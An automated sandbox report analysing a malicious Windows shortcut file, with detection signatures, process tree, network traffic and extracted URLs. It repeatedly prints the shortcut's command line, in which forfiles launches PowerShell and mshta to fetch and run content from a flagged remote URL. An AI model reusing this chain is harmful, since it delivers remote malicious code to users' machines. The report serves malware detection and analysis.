Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8t6beMY1wO.lnk

Overview

General Information

Sample name:8t6beMY1wO.lnk
renamed because original name is a hash value
Original sample name:4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb.lnk
Analysis ID:1512349
MD5:50e161c24d2f447015cae82cccaf4885
SHA1:f4f7fa40c75d74e22df41b1916893b514c54e384
SHA256:4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb
Tags:62-133-61-56lnkPeakLight-Related
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • forfiles.exe (PID: 2852 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5908 cmdline: . mshta https://vidstreemz.b-cdn.net/nexto MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 2216 cmdline: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 5612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, CommandLine: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto, ProcessId: 2216, ProcessName: mshta.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . mshta https://vidstreemz.b-cdn.net/nexto, CommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 2852, ParentProcessName: forfiles.exe, ProcessCommandLine: . mshta https://vidstreemz.b-cdn.net/nexto, ProcessId: 5908, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5612, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://vidstreemz.b-cdn.net/nexto...Avira URL Cloud: Label: malware
Source: https://vidstreemz.b-cdn.net/nexto;Avira URL Cloud: Label: malware
Source: https://vidstreemz.b-cdn.net/nextoAvira URL Cloud: Label: malware
Source: vidstreemz.b-cdn.netVirustotal: Detection: 12%Perma Link
Source: 8t6beMY1wO.lnkVirustotal: Detection: 33%Perma Link
Source: 8t6beMY1wO.lnkReversingLabs: Detection: 45%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: unknownHTTPS traffic detected: 138.199.36.7:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 169.150.236.104 169.150.236.104
Source: Joe Sandbox ViewIP Address: 169.150.247.39 169.150.247.39
Source: Joe Sandbox ViewIP Address: 169.150.247.36 169.150.247.36
Source: Joe Sandbox ViewASN Name: ORANGE-BUSINESS-SERVICES-IPSN-ASNFR ORANGE-BUSINESS-SERVICES-IPSN-ASNFR
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /nexto HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vidstreemz.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global trafficHTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /nexto HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: vidstreemz.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /assets/landingpage/css/unconfigured.css HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/images/bunnynet-logo.svg HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunny.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: fonts.bunny.net
Source: global trafficHTTP traffic detected: GET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1Accept: */*Referer: https://vidstreemz.b-cdn.net/nextoAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bunnycdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css?family=Rubik:300,400,500,700,900 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.bunny.netConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: vidstreemz.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: fonts.bunny.net
Source: global trafficDNS traffic detected: DNS query: bunnycdn.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: bunny.net
Source: global trafficDNS traffic detected: DNS query: bunnycdn.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Sep 2024 07:23:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: BunnyCDN-DE1-1047CDN-RequestId: dadb726982688969a757bb31ab82be38
Source: svchost.exe, 00000006.00000002.2701659030.000001BD6B490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.bunny.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000004.00000002.2700827513.00000279E78AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698362018.00000083998FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E78B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E785C000.00000004.00000020.00020000.00000000.sdmp, il-bg-black-flower[1].svg.4.drString found in binary or memory: http://www.bohemiancoding.com/sketch
Source: mshta.exe, 00000004.00000002.2699958803.00000279E73E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net(
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/%z
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/(
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/.
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/6
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/D
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/L
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/O
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/P
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/S
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/X
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/Z
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/l
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/ptI
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/t
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svg...
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgb(
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.css
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/v2/images/bunnynet-logo.svgx
Source: mshta.exe, 00000004.00000002.2702545801.00000279EC212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunny.net/x
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/L
Source: mshta.exe, 00000004.00000002.2699958803.00000279E73E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssnt
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/2
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7852000.00000004.00000020.00020000.00000000.sdmp, unconfigured[1].css.4.drString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)M
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...-
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4B
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7X
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgT_
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXo
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgq
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgss
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bunnycdn.com/~
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Rubik:300
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/p
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-aW
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-arabic-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyr
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrilli
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normw
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff)
